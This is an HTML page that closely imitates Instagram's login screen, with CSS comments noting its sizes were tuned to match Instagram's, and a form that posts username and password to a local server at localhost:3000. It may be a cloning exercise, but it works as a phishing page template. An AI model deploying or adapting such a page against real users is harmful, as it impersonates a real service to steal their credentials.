<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="assets/css/main.css">
  <title>Instagram</title>
  <style>
    .c-btn {
      background-color: #3897f0;
      color: #fff;
      font-weight: bold;
      border: none;
      padding: 5px 9px; /* Adjusted padding to match Instagram's button size */
      border-radius: 5px;
      cursor: pointer;
      width: 100%; /* Full width button */
      box-sizing: border-box;
      font-size: 14px; /* Adjusted font size to match Instagram's button size */
    }

    .c-btn:hover {
      background-color: #3578e5;
    }

    .c-panel__input {
      background-color: #fafafa;
      border: 1px solid #dbdbdb;
      border-radius: 3px;
      padding: 9px; /* Adjusted padding to match Instagram's input size */
      margin-bottom: 6px; /* Adjusted margin to match Instagram's spacing */
      width: 100%;
      box-sizing: border-box;
      font-size: 12px; /* Adjusted font size to match Instagram's input size */
    }

    .c-panel__input:focus {
      outline: none;
      border-color: #3897f0; /* Focus border color */
    }
  </style>
</head>
<body>
  <main class="l-main">
      <div class="l-main__img">
        <img src="assets/img/homepage.png" alt="Smartphones">
      </div>
      <div class="l-user">
        <div class="c-panel group">
          <img class="c-panel__img" src="assets/img/instagram.svg" alt="Instagram">
          <div class="c-panel__form">
            <form action="http://localhost:3000/login" method="POST">
              <input type="text" name="username" class="c-panel__input" placeholder="Phone Number, Username, or email" required>
              <input type="password" name="password" class="c-panel__input" placeholder="Password" required>
              <button type="submit" class="c-btn">Log In</button>
            </form>                     
            <span class="c-panel__span">OR</span>
          </div>
          <a href="#" class="c-panel__facebook">Login with Facebook</a>
          <a href="#" class="c-panel__forgot">Forgot password?</a>
        </div>
        <div class="c-signup group">
          <p>Don't have an account? <span>Sign up</span></p>
        </div>
        <div class="c-app">
          <p>Get the app.</p>
          <div class="c-app__download">
            <img src="assets/img/apple.png" alt="Apple Store">
            <img src="assets/img/google.png" alt="Google Play">
          </div>
        </div>
      </div>
  </main>
</body>
</html>
